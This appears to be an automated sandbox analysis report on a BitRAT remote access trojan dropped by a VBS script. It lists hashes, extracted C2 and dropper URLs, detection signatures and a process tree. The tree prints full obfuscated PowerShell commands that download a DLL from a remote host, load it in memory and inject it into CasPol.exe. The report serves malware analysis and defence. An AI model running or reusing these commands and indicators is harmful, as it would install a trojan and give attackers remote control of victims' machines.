bitrat | 69533ca8040278fd915f469d1165ae8e78b16c7d32369a715da745a7592e8094

General

Target

e2a66d3573ce5e66dacf16840feab675adb111081834fc198d42fc6601acd931.vbs
Size

160KB
MD5

e7eb16683c5e373b8466a0ac1d2a5bd4
SHA1

a286dd06a1cfc628c2be2fa1fd8c8992bc455415
SHA256

e2a66d3573ce5e66dacf16840feab675adb111081834fc198d42fc6601acd931
SHA512

07ae198a45f0db3d087d6d9cc191536078f16aced919418651fd00f41c38bdf0ac456f4624ace849fc6c01660b7e907a2ab5cac1bca8141cfc28da6b6e316ffd
SSDEEP

192:n444v444QT44v444444cOggjz44v4144v4K444b44KHVJ4hXFBl/U0zsBy0hfLb3:IoOggj4+gBGU1jt

Score

10^/10

bitrat trojan upx

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://wtools.io/code/dl/bE0V

Extracted

Family

bitrat

Version

1.38

C2

dfeefrtythg.duckdns.org:1207

Attributes

communication_password
81dc9bdb52d04dc20036dbd8313ed055
tor_process
tor

Signatures

BitRAT
BitRAT is a remote access tool written in C++ and uses leaked source code from other families.
trojan bitrat
Blocklisted process makes network request 3 IoCs

Processes:

powershell.exe

flow pid process

6 2040 powershell.exe
8 2040 powershell.exe
10 2040 powershell.exe

flow	pid	process
6	2040	powershell.exe
8	2040	powershell.exe
10	2040	powershell.exe

UPX packed file 6 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
behavioral2/memory/2936-137-0x0000000000400000-0x00000000007E4000-memory.dmp	upx
behavioral2/memory/2936-139-0x0000000000400000-0x00000000007E4000-memory.dmp	upx
behavioral2/memory/2936-140-0x0000000000400000-0x00000000007E4000-memory.dmp	upx
behavioral2/memory/2936-144-0x0000000000400000-0x00000000007E4000-memory.dmp	upx
behavioral2/memory/2936-146-0x0000000000400000-0x00000000007E4000-memory.dmp	upx
behavioral2/memory/2936-149-0x0000000000400000-0x00000000007E4000-memory.dmp	upx

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

WScript.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation	WScript.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 5 IoCs

Processes:

CasPol.exe

pid process

2936 CasPol.exe
2936 CasPol.exe
2936 CasPol.exe
2936 CasPol.exe
2936 CasPol.exe
Suspicious use of SetThreadContext 1 IoCs

Processes:

powershell.exe

description pid process target process

PID 2040 set thread context of 2936 2040 powershell.exe CasPol.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Suspicious behavior: EnumeratesProcesses 6 IoCs

Processes:

powershell.exepowershell.exe

pid process

4836 powershell.exe
4836 powershell.exe
2040 powershell.exe
2040 powershell.exe
2040 powershell.exe
2040 powershell.exe

pid	process
2936	CasPol.exe
2936	CasPol.exe
2936	CasPol.exe
2936	CasPol.exe
2936	CasPol.exe

description	pid	process	target process
PID 2040 set thread context of 2936	2040	powershell.exe	CasPol.exe

pid	process
4836	powershell.exe
4836	powershell.exe
2040	powershell.exe
2040	powershell.exe
2040	powershell.exe
2040	powershell.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

Processes:

powershell.exepowershell.exeCasPol.exe

description	pid	process
Token: SeDebugPrivilege	4836	powershell.exe
Token: SeDebugPrivilege	2040	powershell.exe
Token: SeShutdownPrivilege	2936	CasPol.exe
Token: SeShutdownPrivilege	2936	CasPol.exe

Suspicious use of SetWindowsHookEx 2 IoCs

Processes:

CasPol.exe

pid process

2936 CasPol.exe
2936 CasPol.exe

pid	process
2936	CasPol.exe
2936	CasPol.exe

Suspicious use of WriteProcessMemory 14 IoCs

Processes:

WScript.exepowershell.exepowershell.exe

description	pid	process	target process
PID 4492 wrote to memory of 4836	4492	WScript.exe	powershell.exe
PID 4492 wrote to memory of 4836	4492	WScript.exe	powershell.exe
PID 4836 wrote to memory of 2040	4836	powershell.exe	powershell.exe
PID 4836 wrote to memory of 2040	4836	powershell.exe	powershell.exe
PID 2040 wrote to memory of 2208	2040	powershell.exe	CasPol.exe
PID 2040 wrote to memory of 2208	2040	powershell.exe	CasPol.exe
PID 2040 wrote to memory of 2208	2040	powershell.exe	CasPol.exe
PID 2040 wrote to memory of 2936	2040	powershell.exe	CasPol.exe
PID 2040 wrote to memory of 2936	2040	powershell.exe	CasPol.exe
PID 2040 wrote to memory of 2936	2040	powershell.exe	CasPol.exe
PID 2040 wrote to memory of 2936	2040	powershell.exe	CasPol.exe
PID 2040 wrote to memory of 2936	2040	powershell.exe	CasPol.exe
PID 2040 wrote to memory of 2936	2040	powershell.exe	CasPol.exe
PID 2040 wrote to memory of 2936	2040	powershell.exe	CasPol.exe

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\e2a66d3573ce5e66dacf16840feab675adb111081834fc198d42fc6601acd931.vbs"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4492

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $iUqm = 'JABSAG8AZABhAEMAbwBwAHkAIAA9ACAAJwAlAC✌✌✌AJwA7AFsAQgB5AHQAZQBbAF0AXQAgACQARABMAEwAIAA9ACAAWwBzAHkAcwB0AG✌✌✌AbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACgATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcABzADoALwAvAHcAdABvAG8AbABzAC4AaQBvAC8AYwBvAGQAZQAvAGQAbAAvAGIARQAwAFYAJwApACkAOwBbAHMAeQBzAHQAZQBtAC4AQQBwAHAARABvAG0AYQBpAG4AXQA6ADoAQwB1AHIAcgBlAG4AdABEAG8AbQBhAGkAbgAuAEwAbwBhAGQAKAAkAEQATABMACkALgBHAG✌✌✌AdAB✌✌✌AHkAcABlACgAJwB4AEsAdgBLAGsAdQBOAFoALgBVAEcAbAB5AG0AegBVAGcAJwApAC4ARwBlAHQATQBlAHQAaABvAGQAKAAnAF✌✌✌ARABzAFMAaQBEAGIAYgAnACkALgBJAG4AdgBvAGsAZQAoACQAbgB1AGwAbAAsACAAWwBvAGIAagBlAGMAdABbAF0AXQAgACgAJwBiADMAMAA0AD✌✌✌AYQA1AGIANAA2ADgAMAAtADIAMQA1ADkALQA0ADYAYwA0AC0AOAA2ADMAZgAtADYAOQAyADMAMQA4AGYAZQA9AG4AZQBrAG8AdAAmAGEAaQBkAG✌✌✌AbQA9AHQAbABhAD8AdAB4AHQALgBvAGQAbABhAHAAcwBlAHIALQB0AGkAYgBGADIAJQBuAG8AaQBjAGEAegBpAGwAYQB1AHQAYwBBAC8AbwAvAG0AbwBjAC4AdABvAHAAcwBwAHAAYQAuAG✌✌✌AOABiAGIAZgAtADIAMgAwADIALQBuAG8AaQBjAGEAbQBhAHIAZwBvAHIAcAAvAGIALwAwAHYALwBtAG8AYwAuAHMAaQBwAGEAZQBsAGcAbwBvAGcALgBlAGcAYQByAG8AdABzAG✌✌✌AcwBhAGIAZQByAGkAZgAvAC8AOgBzAHAAdAB0AGgAJwAgACwAIAAkAFIAbwBkAGEAQwBvAHAAeQAgACwAIAAnAFIAbwBkAGEAJwAgACkAKQA=';$OWjuxDt = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $iUqm.replace('✌✌✌','U') ) );$OWjuxDt = $OWjuxDt.replace('%جزدییامတجزدییامတ%', 'C:\Users\Admin\AppData\Local\Temp\e2a66d3573ce5e66dacf16840feab675adb111081834fc198d42fc6601acd931.vbs');powershell.exe -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command $OWjuxDt
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4836

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command "$RodaCopy = '%%';[Byte[]] $DLL = [system.Convert]::FromBase64String((New-Object Net.WebClient).DownloadString('https://wtools.io/code/dl/bE0V'));[system.AppDomain]::CurrentDomain.Load($DLL).GetType('xKvKkuNZ.UGlymzUg').GetMethod('UDsSiDbb').Invoke($null, [object[]] ('b3045a5b4680-2159-46c4-863f-692318fe=nekot&aidem=tla?txt.odlapser-tibF2%noicazilautcA/o/moc.topsppa.e8bbf-2202-noicamargorp/b/0v/moc.sipaelgoog.egarotsesaberif//:sptth' , $RodaCopy , 'Roda' ))"
3⤵
- Blocklisted process makes network request
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2040

C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
4⤵
PID:2208

C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
4⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:2936

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

1

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
Filesize
3KB

MD5
f41839a3fe2888c8b3050197bc9a0a05

SHA1
0798941aaf7a53a11ea9ed589752890aee069729

SHA256
224331b7bfae2c7118b187f0933cdae702eae833d4fed444675bd0c21d08e66a

SHA512
2acfac3fbe51e430c87157071711c5fd67f2746e6c33a17accb0852b35896561cec8af9276d7f08d89999452c9fb27688ff3b7791086b5b21d3e59982fd07699

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
64B

MD5
5caad758326454b5788ec35315c4c304

SHA1
3aef8dba8042662a7fcf97e51047dc636b4d4724

SHA256
83e613b6dc8d70e3bb67c58535e014f58f3e8b2921e93b55137d799fc8c56391

SHA512
4e0d443cf81e2f49829b0a458a08294bf1bdc0e38d3a938fb8274eeb637d9a688b14c7999dd6b86a31fcec839a9e8c1a9611ed0bbae8bd59caa9dba1e8253693

Download Submit
memory/2040-136-0x00007FF8F32C0000-0x00007FF8F3D81000-memory.dmp

Filesize
10.8MB

Download
memory/2040-141-0x00007FF8F32C0000-0x00007FF8F3D81000-memory.dmp

Filesize
10.8MB

Download
memory/2040-134-0x0000000000000000-mapping.dmp

Download
memory/2936-144-0x0000000000400000-0x00000000007E4000-memory.dmp

Filesize
3.9MB

Download
memory/2936-147-0x0000000074B30000-0x0000000074B69000-memory.dmp

Filesize
228KB

Download
memory/2936-139-0x0000000000400000-0x00000000007E4000-memory.dmp

Filesize
3.9MB

Download
memory/2936-140-0x0000000000400000-0x00000000007E4000-memory.dmp

Filesize
3.9MB

Download
memory/2936-137-0x0000000000400000-0x00000000007E4000-memory.dmp

Filesize
3.9MB

Download
memory/2936-150-0x0000000074EB0000-0x0000000074EE9000-memory.dmp

Filesize
228KB

Download
memory/2936-149-0x0000000000400000-0x00000000007E4000-memory.dmp

Filesize
3.9MB

Download
memory/2936-148-0x0000000074EB0000-0x0000000074EE9000-memory.dmp

Filesize
228KB

Download
memory/2936-138-0x00000000007E2740-mapping.dmp

Download
memory/2936-146-0x0000000000400000-0x00000000007E4000-memory.dmp

Filesize
3.9MB

Download
memory/4836-145-0x00007FF8F32C0000-0x00007FF8F3D81000-memory.dmp

Filesize
10.8MB

Download
memory/4836-133-0x000001C80FF80000-0x000001C80FFA2000-memory.dmp

Filesize
136KB

Download
memory/4836-135-0x00007FF8F32C0000-0x00007FF8F3D81000-memory.dmp

Filesize
10.8MB

Download
memory/4836-132-0x0000000000000000-mapping.dmp

Download

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads